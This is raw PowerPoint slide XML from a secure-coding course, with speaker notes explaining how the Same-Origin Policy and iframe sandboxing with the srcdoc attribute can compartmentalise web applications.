            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>But the HTML5 specification has introduced a second useful iframe attribute. The srcdoc attribute allows you to specify the content of an iframe within an attribute. By specifying the content inside the srcdoc attribute, you avoid fetching the page over the network. The combination of srcdoc with the sandbox attribute offers a fine-grained isolation technique. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The only drawback of the srcdoc attribute is the lack of support in the Microsoft browsers. In these browsers, the src attribute can still be used as a fallback.</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Same-Origin Policy does a lot more than protecting contexts from unauthorized access. It supports the compartmentalization of an application. Similarly, an application can further restrict untrusted content with the sandbox attribute. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>So far, we talked about isolating content in separate browsing contexts. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31601228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Same-Origin Policy isolates browsing contexts with different origins from each other. This isolation prevents malicious browsing contexts from attacking other browsing contexts.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>However, the security properties of the Same-Origin Policy can be used to increase the security of an application. Modern applications combine components with different sensitivity and trust levels. In this lesson, we investigate how to leverage the Same-Origin Policy to compartmentalize your applicatio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> using iFrame sandboxing.</a:t>
            </a:r>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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490442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vet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t> this</a:t>
            </a:r>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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84611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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36033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A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="811603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114800"/>
            <a:ext cx="8229600" cy="1828800"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200" baseline="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9081" y="1572859"/>
            <a:ext cx="4444998" cy="2222500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687294" y="6165315"/>
            <a:ext cx="7769412" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JIM MANICO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Webdings" charset="2"/>
                <a:cs typeface="Webdings" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Coding Instructor      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.manicode.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76200787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B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36770847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Rever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solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©2014  MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35814171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76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33524749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8228013" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27929779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49077"/>
            <a:ext cx="8229600" cy="2094523"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click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4981" t="-2" r="34984" b="41168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398442" y="1244101"/>
            <a:ext cx="2365404" cy="2316800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687294" y="6165315"/>
            <a:ext cx="7769412" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JIM MANICO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Webdings" charset="2"/>
                <a:cs typeface="Webdings" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Webdings" charset="2"/>
                <a:cs typeface="Webdings" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Coding Instructor        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.manicode.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34776717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9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1368425"/>
            <a:ext cx="8229600" cy="480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457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4605057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1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>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9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37037788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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6172200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2743200"/>
            <a:ext cx="8229600" cy="2743200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="0" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFF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9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4258428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ub-page">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6172200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2743200"/>
            <a:ext cx="8229600" cy="2743200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="0" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
